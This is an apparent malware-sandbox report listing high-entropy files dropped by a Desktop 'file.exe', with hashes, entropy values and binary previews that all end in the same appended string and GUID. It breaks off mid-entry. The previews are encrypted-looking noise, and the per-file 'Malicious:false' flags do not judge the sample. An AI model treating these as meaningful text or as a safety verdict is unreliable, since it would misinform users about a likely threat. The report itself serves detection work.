          Preview:<?xml.....h.7.....U+.n...;.:.e2.lH.o.\p.g.W3.n4a..........-.Y3Z-2W.b..}....x.3.}.qQ<...cO.h..D..>4F3.n...{|._U..T.pK.....:.....QR..Aj........sgl..!..[....>.8.....^.p......>...d..79#..v.W.......\0..D..N.7(.....Rp*.T..#.!J./._Y.Fj..q..p.#.#9.<.....z...`....^KQ.x...8.G...+..N..<.|..S..t.SrAp.......#....\C.h....Te.h.D..}t.......*7F.SEp...n.0......Gt3-...LLGm{G..[.N!.yJ..8x.H.(....N.,04..{.p..4.).(....(...-.o.e3Tk:..k0q..p.....D..2....'.B.....[..I..(...R. ..pd.o......C...q..$8......6.^.d....y,"a.P..."..Q...R\..~x.. .%CTtY...Eo...=V}.....^e..+o...#...Tl..^X..0Vu.....UU.......vR...../..&q...[."..f.V...H...(>.....J.w.Ji.\...(>i..3....n.ct..qI...c...h..@....`....8..n..d..[a... .ZV,.q3Z..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.690116931855928
          Encrypted:false
          SSDEEP:12:qMtSvNcIWrG/GC67papJKvXP96Q0asDwTOJOMuhDVY4Mg9yFyFY/h36xPLNixpZE:dSvZWBkKvX70wOYMuhDRt9yFf361NiTW
          MD5:4AFF1DA51250CE487DBC330376FB7561
          SHA1:69AC4A357A815307F6B10350FCD4C14200CA66DA
          SHA-256:D55EA6826DFA5F2BD41A187D7702391A3050345F4ED66CCB596FACF8E5E339AB
          SHA-512:0E716E8A3AC47AC50FD796344382479D207851226104E391533AB5B74273928EAD5C1A160DC03556E1226A4122B99E94966C1A9CD91CBEF2B1C0D606069B5B94
          Malicious:false
          Preview:<?xml.CL.;....}.9M...v4.'.?.%..O.#.tg...64!.......9.7..JH..K.v...l.a.Z$$*...q`.\...|.U......c31..p,...c.lsS....Vs.`./.w.3.$*rs..E.m .23..'.........A...6X.=G...j...l....q...5^Z2..+..Q:}D../=[.^.rh.D.w..'u.s.Z..%>..8.j.=.2.2f.$...|..IBH..B...o].<..@vPq?d...A.....kslaUW......q.w...e.....z..^..)..a/..HVo...o.#u.AS.T...4.=...&..,`..+O8&.).T..FPiDf9....[....}....s\,..%.<|.+j...F.TTf.t.u...=)N.Hjc...I}24e.....D%I..E..~xy.l.....i..*...7.)HBt..V...&9.(/.....;Z...6.*..&G]..j8....oi.. /@N@...fZ.#|Q..{i.j..F.\A|....WN.z...-.d..$.S.D.....%z\.?..+...O.eZ........>gh..)..W[....G;b...7..bqyh"...&aS..$....r..X.......f{{\v....r.xJuz^y.`D..M.W1g..m.n.Wr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):810
          Entropy (8bit):7.7349479523242515
          Encrypted:false
          SSDEEP:24:9XWH30Hq95KHfh6JsIVBovOxL3xrH8+8aZiTkbD:9ziuBosOx5c7ziD
          MD5:F87A567922492BB0271A7F392610CDD7
          SHA1:2B75D0EF367FB65C4B612C8253D1385FD4D180AC
          SHA-256:8A8705A2C678E1FF36C587DDB210C8FB6881EC46688650C83269F9B39FF04DD4
          SHA-512:4EA188013AB474FB7E6888EBBC809F322CF31FE4EB7A2A070AA8E6C04BAC666B7FD310CAC230F500B1B51C92D140E60F0663E6CB19C63B0CEC1BA09708E24FDD
          Malicious:false
          Preview:<?xml<....H.?.u.P..R......1&.iN.I.jJO,.k...y.W]...8.%z.&..d..@....q..c...e.E....!.ax.......K....PSU.]./c.+}...@.uZ..$o...]....E..Z.p....f......8P..Y..........[..g........E.Gwm...icA......RD.....I..m/b.JD.....^.@'b...dZ|v.6W2..BT.t_..*D...8 e.F..'*._...[......0@...-.J^....k.....9.p\..........}(.Li(i..ps..~.jk.I_..h.......,{..b......r+.....v..?.ffn..eI.//...Gh....rQf.......R..`..nqG..Z.?zM.iP..*.....+...!...%F..|.S..[.. >...D..G...$n.t...<..K..r....3Z.e%L..#E.1D..X..zx.s..f..W..B6..s.k..../_9u.#.>.p.A.YU.`.."0..]...Q...I;...l...x.........5....N[..*#H.../.G....4..e.+7.-.....[f.R..Y..?7Li.V._~>t.Q....L.^..o....T......^.nPyc...!`.M....K.N...kD..J.D....6i=.G..>.../.X.G/..*.$.c..5..P...CJ.b.H..YUD.}r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.710189140224116
          Encrypted:false
          SSDEEP:12:dj4tjMRjfsgnJmHatawgbDL9vuYFukW6r1K5r8UmDfc0QmH1ktX++whKfixpZacq:dj4tGsgnJbtawCvuBh605rpuk0FOtCwd
          MD5:AFE023BA6B81A19F3E6F4D9B3477A87E
          SHA1:FCE44D758FE80FD8EB7309FE5121216A442A5FDA
          SHA-256:5DBDCA1BFEAE80129F7DA5AA6C4899D2ED8DD80771D9540AD26AC3B3980A8BFB
          SHA-512:B7FCA3CEB916BFB5849593C39C99CCD30274A0105AEC9FA7F989AD4C3A81E832275943E42A10BBB6D183D0939C5EDAAA79DBCC47350367B416B737BBA97CBA33
          Malicious:false
          Preview:<?xml.^Q..%@.?~.....,c5Y...=2..$..E.3.m...u9#..j.V:4...E......VS..M....)5s[d...I..T...3..x$).P..Hu.....M.L...I.....[.t.d\g...J....;...U...b.S"b.m....CJE}...?N.L.nB..k..]..m8z..S.1D..?(Q@.,re.G=...EH6r8.T.KddtU.Gs.z.<...w.a...^|../c..d......7.\.W....$r.hu..-.iH2..6..K./o....?.R...E....*(.hM...1.q.H.....T....iv.....F).$..o..1.....@...p!^.'K+...>,.}+w...?.u.{.GK..d...cn......v...3..n..":.x.....>@>w...m.0.)..M.u..W..<....N.5..y....a.M...!..!..i..=r.B.n..[...8.C.....RFT..&...F...j>wh...)..3S..........9...I..wC...*.Z..?..7j.."..|..{p_&....,..6F.b..<..B.A.8.+e|....>.'.w..E=.....D..p...~1/..M..g.HJ.A.0...7...@...{....=.....f(..l....wj...}q.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):810
          Entropy (8bit):7.721068145625983
          Encrypted:false
          SSDEEP:24:Gf8Tm1azRen+UnX4gHFEdnsbmdy7iTkbD:E8fReDXXHan6m4uiD
          MD5:834D77D74FB05D6E39EDB5B95F0DAE4D
          SHA1:A9331095E818CF5872487C273C6CC77C65C03A94
          SHA-256:CAC9E0AA25EEB669BBF634EAF1297DB3FA1C8DDB1762DF495AA949949637EE3F
          SHA-512:562BC4E4D361E2483689407640A28AC8FFAE6B5F130BB7126D706B42FA3EC8FDFD46E6F6750850D862BAE13EE624AB79B792D0CE417E8FA93DF8BA00D7506087
          Malicious:false
          Preview:<?xml|pq....S........|0..v...&.rI.I.k.k&R....E_..i1..f...h...m..5.....Yp...[El.)..s... 6.....O.....Iy...&.v*...m.N>n.:.....y.~.j....i..JxR.Z...._;........r..8.$.Z.Z\.4..K#......D...D.t...Z.......*...iU...,.j.Rd.uQX.[.........NT.5.....$.._}..\......Q.M.qaM7..}. q..!..Q.0..x^.#..s...|?..&0.c.x.9..R..A...p. -.0.{1....j.c.I.\.:GT.......r.....O./.. .B ..%.../.:.>{g.......]..da....8... ..S.=#......x.............q.}..de...sO2!...) .J~O.....UQt....}y...Nl...?Y..S.<..Y..0....$....WQl.3.np.mn.}6O".....m......oh.......1.......K......|..*fC..q....D....%.+.#.....]B.D...H-.8$_9......L.j>J..>......[WU..r+}...Z.V-h.zd+.."T6.D.g.D..$..)....KX..,SSk7...Z...8.p#..?"..e.E...Ub....T..!.hNI......v.b.w.nr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):752
          Entropy (8bit):7.721727273325434
          Encrypted:false
          SSDEEP:12:J0TH2IQSudcaKh1Kb66VvO/rp5x+3erBXJgd+Imaer3tdKWI4YU+cgxCsJESixpW:J6nQSpTKbrvODpd/qVsry54CcUC0ESiq
          MD5:7A477182A4AE9C4380F41241A5F58683
          SHA1:A58D40154E4F0559564288402AE5C0DFA28B0D39
          SHA-256:E084BF799380B18A7DDA4E0C46A2AF547FAA67683CE64640253182E54D9CAE67
          SHA-512:FFB8652E6BBE3FEC0F304A07DD169E7AE7D833E445B2C7580FB3C3F178EDA02269E152E23CFF42068EBD87DDC4EF087BE7F56CB27AC171E413ECD1D71CEBABF1
          Malicious:false
          Preview:<?xml.d..A}|I.`....?......0..m.k.].=.[zQ..p....=.j0..b=...t.Q...a..,!.....2.!j... .$.....".CH7..B3..c)...%NX=,.....>..|.....l.Q.0....<.k../.H{#.....' Z...z......n.'.....t.^%..DA.........OCu..y....BL.....PK.v...eQA.....<.}Y...'..9.....X.m2..<........|.-.,..J>[..#...q>..d..Z.|d9.\d.gq.e........."V.t.p.q.,.l..<_=-n\j&..;ms..*.......?........l.....W......*8...x.....BP....?..y......,bJ...........*....N...sQ%.....[.*...u...Kr.5#..}..e..Z.">~?..l..].......{.9:.y....r.........j.._}.N.#../.a6..93(..II%.QW\&...pY ...P.....<..[NXS......`..{y.f=GVv&)N.......a..b!c-...<...........u.UT...I.d\....YB..X..u.AJ5..UO....q..,]..|8J.G.d.&A.2W+.P(.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):805
          Entropy (8bit):7.714696106173858
          Encrypted:false
          SSDEEP:12:DlAZCPtMGr3LUf4tz3damxetx137cimkAa1RY6byVCSt2IixpZacii9a:hF1Zjwf49Qmxi37cimO11s5iTkbD
          MD5:3E134677FCAE2C436D818E678C364175
          SHA1:BEA9BF51DAAA083DD7CA42F4D37586C338AFE79B
          SHA-256:DB32C94A5ADEF4849B36EAD76970D45EFB76FBAE5FF51E717D335317C9950342
          SHA-512:FE0D142E4CFFF1D44F7CAE84FD92ABF396C11E1E08FBD9E12D312FCE742D8C1E63385695664B67266F2DCA5BA54BD3537450EAC07F8BC40B5FEBCDC08F9CF8E9
          Malicious:false
          Preview:<?xml.f.1c.5&.V..........wA...!....=.b.sFv.-../U....o.~.B.T.[.8....'.A[c.n........Az.4....u.-."..'...t....>..Xm........F.T@.g.x,C{n..vV..;.%.h...;./..N8..#...PtzO.....)...c.I.l..aO:.Rr....R.:-...L.A.jh."|.H.....B.Y.|.....8..}H...!.v..S.,..f.x&.ye....X4......r..fk.....2.?.7Io.jlF....^2...+.....w....f.B...`.s.~..H...5V..K]L.....-.*.#..+.A.K...@6.>Em%....1.`EsI...o.}.._..+.^....nc.Y..[.gC..Z....C..f2......RK<.....-.._>H.0u....+.=.,xD.....`...h........:X......5...b..t..v.zR.i...>x!..0.+?...Z..... .#"....X.{..d...8.F5.{Z.Li_]c.a.].c..U....c.I...Es..j.G3.b.9....+d...!.R..y `.\,.{..,...6 I.....].Xm....S..'<.....Sm....[N...a.>......#o..0".u.Rj3.~..k.Q.)y."...#....dX....3B.......@#...#.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.696132494191883
          Encrypted:false
          SSDEEP:24:3WvCyuYeAueurJawR8cczyiQaz1NgLiTkbD:PT7Afa8DzHz1NgeiD
          MD5:B66B06B3490679974AAE927231F48CE5
          SHA1:8DB4D31B365E20BF369C640DA869915F450C964C
          SHA-256:1BAD05344CCDBF362B75CC0C2203BFB4111A1ADA0949BFAAD45C6B9E3EB6D92C
          SHA-512:BD5054FD158278D7E72719E01E18A91BE082F263CC7EB7B5AC69DDDF226A18B91F31233E2C23A39183E4BF129FDBF36B9E3BA045EB271FA30EE21431CA65A136
          Malicious:false
          Preview:<?xml.}M...0..^`............&....*I...w67})....`9/....=M...6.WF.{Y...J...;.&.[......r...Vs...6_....."..^.Br.....Gt@...`. )M.YC.v..'.laA.........U....Lo.....l..7L..M.u.....gD.p:.R{...I...NF....'`u$.!.B.U...OajM....6..=\.em! .-............cQ8k9X.........Kn...`.s.._$.k..>.vY.bk.8.....F..6..nj.A..<..B..CF.46....0aY...i..>.#..emIG....R...8n!.F.....N6C..i.t....AB.o..q.je.........\..DI.w...c'..\..*.X.g..CI..5Z5....L...D..K...O...;.=.Y;..J.'.....v.'..o..t.~.8.FF..*.N.6$G..6...a.>....w.6.|....v...c/."@......$g|(aZ......:V.....u...(.D.FW.G...S.v......_.>...(....)(n[.R..-...j......J4.!d.F~....w..PH.$K0..0.y..y8;3.0....t.==.Op<o.>h;....=....Bnm5.fO..B.AH..O.+.....^.J..THl...X.4.7..d..Gr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):818
          Entropy (8bit):7.770725377621414
          Encrypted:false
          SSDEEP:12:deRQWzosK9A1IdwWg/Z/8juCd972Pr2Bj/mSPrlG/81M0icgvC6tZF7sixpZaciD:CK9qWKZ/Yn2T2BTb63vC6toiTkbD
          MD5:507916A37851AC85B5179A1ED18A8806
          SHA1:8F5FE317A8AD8C2DA4C06B43EDF3CECE351BA528
          SHA-256:BE06AB123EAA2F6D485B852A16343EADFAD1A59FE73A5FD24A8A752844BE8FF3
          SHA-512:828A96AC39DE167C6B1703C96F2AB55C8EB197D54475A399C9D40B2D916428B9373873456AEC9625340E2FECEB174D61B5325E1EFEF6C2DEE85281075F15AAAA
          Malicious:false
          Preview:<?xmlN....B..K.....E..&.N..:...{...1*..1yM"........`.V..w$.[.k.T...7.b_.\...#...}.>...K ..X.X..$..p&..wT..2m..........E..t.....i^..$V.u1..........'l...OPQ.T.n.."..7;i.<...>.T..h......8O...?(b%.....z.6y..h.1/.b.3.].....R.d.<.}..i4...=P.Mt`...nlY.zGM\...-Q%....^v.,.I[t..Mt1lIK.V..{y..'o.Od.E#.....J_.Z|@Nn_.......*.H?:..y.......qjI.j.9.....& .+...>*-S..Ds.`....`........!.......Qy#:...!....=_.Z...2.dq....%.D.F..7;h.....{....&.7$.rZ.y.|.l.<...~.F.b.z.@..z."u4:p...sN.W......s..:..8.....]!:U.$.C3.Z. .Q0.'fs..`..L%..s.d.W..xf.9c<.......e.&...',........J./..-.y.....%.g..._F$].D.?k...8@`..L...VH...1..,.!.....o%Ik'.$./d.3p3..ew.....q<K....oN=D#.E...fS=......Y..T.S9r.....1...}0.)..[..${.Q....m...'S.\.. ..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):744
          Entropy (8bit):7.7240440470180545
          Encrypted:false
          SSDEEP:12:JxM8v+GpK7oqVsIFNDS7eOjF2wb8wreb2EzL/t84rJyReoQ6RvILGr9VHHyq/ixU:Jb+tplwys2wbhgbHl8YWeo1RQC5V//iq
          MD5:FF39281DB713BDEA122A0345FCBDE786
          SHA1:495A86D31379E144B73FD36C85EFAAEC4573C43C
          SHA-256:D20F7596DC8A99E337880E930C23D50C58BA1DCFEAAD92A115FA5BD36CE5FA76
          SHA-512:ECFCC517E21EBD8E9760B2FF4F945EB5307E6B3D3F830341B38119A36099104C5A0534CE600C21E15235032A0E4370148E4B95727F858C28A154E79BB7423B37
          Malicious:false
          Preview:<?xml..F%..,3....z#c....m._+(..m.....<....zn...s.;....(...z......&...`...u^-.....S..Fu...f.0.,.......Ap.z.e.0..|.....IY!.B.&.`.2N.....F>.......@.....ip.?.....m....C....?0y=....:.rM.J.>.Z.)mO...^.l8.O.y..I..[...+o......Y<.@3|;.k... Cj..L...k....R.[|..b....?......U:....p....*'....,....t..a8PeJ^....>.g,w~...|.....~`....&.k.M.V...r..O.....5Z.....X.....}......y.^.V...QKZ2.....<.H..c;$.<0ma..[.......c.....M]:.^L.......\.....A...q..k.._M......6m.v.7.....c.H..`.u....\.7.'[k.}....X..c...%.mt^Aj.C8.e.P!.C-.....K.....6Kf...+sl.....eF.$.."..4.%>I.T..L.C..$.....O..6..b.H....!l.]3...O..PR...?...d..+.z.Y_..bHgav...'e.h..N6#+.m(q...L.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):803
          Entropy (8bit):7.714890702916759
          Encrypted:false
          SSDEEP:24:rChi72B0xmMK++34P+4SXGkSpTzVeoZfZ9LEbgjiTkbD:rCa2B0dKD3rYFeuZ+8WiD
          MD5:F1A5C5008E1452967F55DC72D95290FC
          SHA1:220E8E8E6EDD0A0724F343B2FC3FC0CA250A3F43
          SHA-256:A7C03A4F04472360BF75C5DC6913B20A074ADE52857A1B099C51D7DD4EE1EC8F
          SHA-512:96D4799FB7144B5860B767D004DA5117EF7CF519DBE2FD43406717C1A772FD7CE7EFF05766A795E59C996B4EA8E5C932645C4FE9527C91D9D8A9A29452D8AF29
          Malicious:false
          Preview:<?xml....RS..$...r.~.<.q.E......[oZ....z:.kn..7.nG.?..G..?4~..'$.v.Y.D)....2*&.t..K.Cn.t... ..O.{9rq.....b=f|.?..8b.Hx...w.}=B.....#.}H..... .jT..hq.......H.......z......p.~.....O..\].P.E.V..$=..R.v..q...+.\q....^.......n.....[.H..Cz#p34.t......z....B.\..:......b.....8NGkk...U.......,.Cw.R.,.BX.U........m.2e..].....m2...I`.j......O.-Z..Ph.ay.D.i.'.@.Z{.N.8GF-..WZQ.......h.&-}....v..M.Ps......o..../..3......w.<X.....uH.=.=S........3.f.y...[..c...k.......G]...@......26..P.b1]..ED.{...<..3........X.2\Z......h%H..KT`.H.x.X........:.69..3..8.....#.j....~\h.(5.:..(.s[.&.d.!....#.i..z...R....\..G.o..&X0..]h...I../..{..l..h=.?....X.!S.9&...".....z..sc..."......&D<....q..&.NT..s:.'Qbr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):760
          Entropy (8bit):7.709846211727297
          Encrypted:false
          SSDEEP:12:DPq8W2yohpfuZseSfmTJqg3ZiB44s/sxO2BZyThe6Kk/LGc126K018Lc661mV9AC:DiD2yohpfuZseSOTbJsns0xO2BMThe6g
          MD5:D71CC46281C67A5479B0A7A0D4676E93
          SHA1:2E5BAB1CC07FC9E991F386FE5CF8383DF1367889
          SHA-256:962B2BA27DB9D551126A380F2381AFC4698D5DBDD20CF3828AB90F9E79FAF717
          SHA-512:0D3402D568959A2985FD702EEB45F32C855BA34992EC109640C05996E2F18420B4D5625798B2AAB8A7BE47A80643B0EA315E18BCAFAF58F280933558C383475C
          Malicious:false
          Preview:<?xml..P...oU....h..8.x9C.Ox.H..........m...".w...U_.s.Fg.w.W.7%......:.....V....g-.........t...b....:.X.2.W..#..&2.G.........J.c....}\..#.p.4?...h.._....L0D.O.".0.a.T../..;..o.Ks..t..7..*..q.Zp..T\....f../.RojhX.....a..C.?..Fb....?.}|.j.{B.......::.J"..I?d1\..g.f.7.>.......Q..."..H....sH.M........z........%..q..m6.!......a........{1...$<.#D.L.U(..S......?O..^...?....m2x..m..l.8).....C..g.e@4|..9.W...mI..H.L@..i....q..,.....N..q...."%.t..S.... _.wh......m..bnp.gZ.f.=... ..u...e..k..()x(._.x.2.yW.>0.....g.W.(.v..:..pl.....f9.5rh......p.".6..^.y.Q..&....C..eG-...<b......N....!%..@.3. ......."...%_....._."\B...gQ.;.!o.6..[@5ZN....@.5...N..T.T..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):835
          Entropy (8bit):7.781188892465341
          Encrypted:false
          SSDEEP:12:1JX4OVxw2asxRnvLvtR74SHuouZSlzFWwCDLnGgTpR5zAz++Mzd8UjMOVixpZacq:AOV3aIBvtSUuZSlzFWwCDT2MZ8OiTkbD
          MD5:DD0753B5F3C8AA067394CD26D0BC6DBF
          SHA1:63DFC92A1ABB41DF3D8D480971AAF74913E26274
          SHA-256:797D0578EADC74748E48BD339A28077D2CD75802A56B1497B726D01A14F50555
          SHA-512:C8BA455E94C3984955AF790943CE18EC90C197F2E1C14A8A55FC9F91B82F78D5E97CACFB9BDE7470A9D3A948B80FFB23F7A5A78C2750AC2C821A5DCDCB9CC49B
          Malicious:false
          Preview:<?xml7.m."f.|..*..)/.k..3u.O....T.D.?R...F...p.V"At....K'......i..........F..D.`..D.a.. >.=.+. ...S>.t...W.....o.n...S....V..8~M..~Q...(.T.jSJ..4y.......b#k.&1?......E.........l...p...tAo..\O.8.]..8E..*)..AS.....V."...6..M.....T.N....rs.C.QU..c.S.....6,.n......5\.r..}#........70..z.9....x...J.d.Y......w..... M.v.RS;.]...=..........R.jy.<.....Ra..'...'.........e.u.%..e.....X .....$,.".E...)iR.B....W..|H...Mh..Jz.....@.....k<"{.//1M^O.&....(....:.Y[3.9........!.7U.$Z->@....'.....BK./.2:.q....dD.9.r........gG..r..g..:.......d...}.{`. ..A.[..$rnIr.<.;....{..q...G...g..!.K4..V..oD.?b...&*h./.V.h.%].I.'.....h..l#....^.65....[....N\...T..O..ap.. s?.5{.....!..l.F.-...Zk...r........^....... v.x...AN...~..u....jmJK..K..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):740
          Entropy (8bit):7.7012255736633
          Encrypted:false
          SSDEEP:12:Mron6/tcZA7bTdgBOG+3Tb3nauAgaXD0YSu+/Wi/hKHKQT8DP6BcixpZacii9a:r6t62fdEOxzz4EPpzvP6BciTkbD
          MD5:4D74B98C973BB55E7503F47FD8CEB858
          SHA1:31BABFAC6150B1885E1B116AAE167DDF0CED8BA4
          SHA-256:86185FD60A99135539A9AA9FB4930A3F7DF6ABB95B34A7B0CF45EA3FB73EC554
          SHA-512:5FD66EC3E1E55F67CA02476E7A3C1AF1CF9EAB77F6ED693BF8B6E099C2CCE78EB5D1F8E544058B0943504D610E6BBC1DC0677D1F2E2287B2AAB40816E6FBB867
          Malicious:false
          Preview:<?xml1...Z....m.!...n......MP...f...@fi..m..&..y.".....CK.."...VW6..)./U...d...-...{".(Ss..td=..dU..s....w.p...U......HR..8..eL..1 .u....^"V..K.`.......a_.qC..tx.I.r..q..t.?..a..+..J.Q.6..S...{&.......g=...Bk.O.}......6....V..)...}....C=.C..0.......KH..J.{.06=.u.<...4..H..f....7:.ZJ.4..C.......[_nN$.h.L<.E.@..g..1>....a...5....%.b.7.....Z..d..x........'.8.".f...Bq.zK%L..8......O....f*<...k....X.C...........j..M.U..!r:,/..}aP...../"....u:~I..b.l..a..l)..B.Z....Z...yt.:.G.........[r.o].o..0|x3.Nx...h..'..n.0-.N1@.^.......C.>.\&x...r.!...*6.K6".t.7. |.......".g<.tl..\.2mP_.iZ........5.9:..U...I..[?*...-...c....6.hR4.V..$.w...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):807
          Entropy (8bit):7.761233457197577
          Encrypted:false
          SSDEEP:24:hE8QUXxteQiq457t34fTOhnDWik4mAAcwviTkbD:hFQUXdn4z4r6Zk46MiD
          MD5:16D924C294C87547C7B1C88D51279F16
          SHA1:D69EF261CA1D96885600486557B98DD030832078
          SHA-256:81417C8481D4F3841BD171D0DF9F726ED4F9493AB0D9B417D556DE499B248F0A
          SHA-512:510AC98F750FDD3359FCC9B8AF108771D06D5622D31545C0D10148B742840348520865DA001DBF93B96E8874A8D50D063C85BAB8DFC0837FFDE2CCAC9E6920A2
          Malicious:false
          Preview:<?xml.O...a\.B....-(......Rf.z.......R]..C(..t.l...b_.-..M....z..".$}.z...|....W.g.H.*..k....y...+JF..Feb.....8#.......?..N..[...B.m.=p....g.q(...vH... NG.9...Z..s0..)...D&..:......c.<........A.i...2.a..t....hG02.I..8s..a.o.t...q.[)h....r@.M...o.....*.5..wUy/....Y.M....?H.w.d.0N..+I..FPj.L.\...v."1...Jw.....V6..\.W...p...Gr..},......t.c..3.@@..mj.."g......*....N..|*...+9...&.;#..v ..d3`...V|.z..Jh..(].+.p..S..O|uD.~...1...=]......n.F...a!Y.b..q4u.rN.......T...........{.{..Tc.f...:..............m....xocQ.:.W`<R....Eb.ED+.d ..h..t.............f........e. .....W.6....=....XD...g{..X..?Tf.z.).5...T]vSi......... ...6....1...V......n.I......\)#..{.....(.]..v.?..#.L....1.J.Uy1u..2.@..gk..N.f.5r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):741
          Entropy (8bit):7.653506685143962
          Encrypted:false
          SSDEEP:12:+4qUBd8K8Ft+Tjk+dMT5aCqqaqnvsP3Cgau0o2/yV4LvVJ7ldvUueiRlES2VixpW:FqU/at+sUS5alynvKCgc/yVUVJJd2ie1
          MD5:68CA5D2786F0AF97ED9CCD8D576F24AA
          SHA1:19D91E10239DD4A761EACFE5376F87A6AD000EDC
          SHA-256:3546A2E2CD53375030765ABF335E54C106919CB43FEFEE2F65ECF84ECBFF8158
          SHA-512:BBA69578F63EEC7B562B58595F7D36248608AF3D0E490205DA31E50C7ACA17ED1F31BEE14D2334AAC9372F14D0BFF78CCB8789B15E0A3E1CFC8558E8EA1911D1
          Malicious:false
          Preview:<?xml..S..5..=..Y....D.UMg...*...?...8..g .Wn..........cEh..n.ka~(..f5\......H.[c*W..?..+u.K..^...b>w......G....;..p.....2....zb..]..H.\..n.X..pf..l...{..[+..7..4._..F.......:u...3B...Q0y.:.q..,.53..6..:..Q.2...I...C..X..YP.T;..:.'.O|.J-X.1 .A..}7.-..;..e..B;..0..H.;#...{.0H...`.Kb.3z.g....@..?._..t.YN...?d...5....t.[...Gg.p...."^..o...XLM.4.%j...\.Z.._.E;..ML.E.?........8>g&......e..,<gvJ.....(b...U;..+.._.f.D.."...UhR.q.T..O.H..[B!.,(..]3.>..p....5.'t;s."d..A.`............B.-A.z.......D..F......v..sG..Y}O.`LW.v.R....l.[..;L.....l.R.....%t'...SG.y.B.LK...f...dJ.].~....1..1..k.J.w.j.1Z*c.L$zy.O..Qn_..E.^...w...Y0..B-..Ey&...Q.]r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):802
          Entropy (8bit):7.7119475715866965
          Encrypted:false
          SSDEEP:12:xCmX0VmEp0nzgS2Q/8i3sscyFCVN5l0SCuh5ga2nloy0eISJlaixpZacii9a:xChWnr2Q0ifcyW5KeenYlylaiTkbD
          MD5:C28434449BF5DC56E73B10EB0FD27B5F
          SHA1:22E8733E8DD477FFDB2F1B15904AB2F58CEA111E
          SHA-256:AD7ABFF54B810249DF548D837B8E1538915D651C98B983DE09367982B57F6BA9
          SHA-512:AC5201D673490367B91343F7B0C23E48220648CF126D8A15F21A04FB221EEDCDC90754BD0E86FAA9F16BB6A81192D62F8BE857F4F2EB7E841E42B8510DE124A7
          Malicious:false
          Preview:<?xml......p9....c..XVuv``..!r.1D...?jf.e......*Md.eCJdG..Bh.4r}.P...q.P...1....8o#..V1....B.hy..'.._..S...%..Pk.M.-..*V9......;.ZL^.S[.r.....2.zF{.*..|O..C...[j(..B....o..Wa...M.i`..... .6S..G4.-.$....`...P..YG..w...H.r..@.....2..&.x>B.:p.Po,.>[8..l.n]..,{&%......"..4u..G.t...A.......9H!:..&.....h....k.._../.N.Y.......~!.=..'...E.6.FpR..y%...$....7.u....Z.{.&..B1..B...L...8.b.Y...V5.*f.<...kb\L.t.....4N.....5X.....'..`+...)..q..."...X......}IK.$.......FX0.[.k\.pu..b...o..U...*}gN6T5..P.d.?..P.i..l......H..].....]G|W.sj.=0L%g.;f....B!...ztzL.%|3./J.3..`...@...P.;.U~".HD......Q..Y..9..5....p..V~...=66.|.R.Pm...V.e_2F.2i..B.....x+..w......1.$f2....:.Q....g.&..V|.8S.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):749
          Entropy (8bit):7.688480337281379
          Encrypted:false
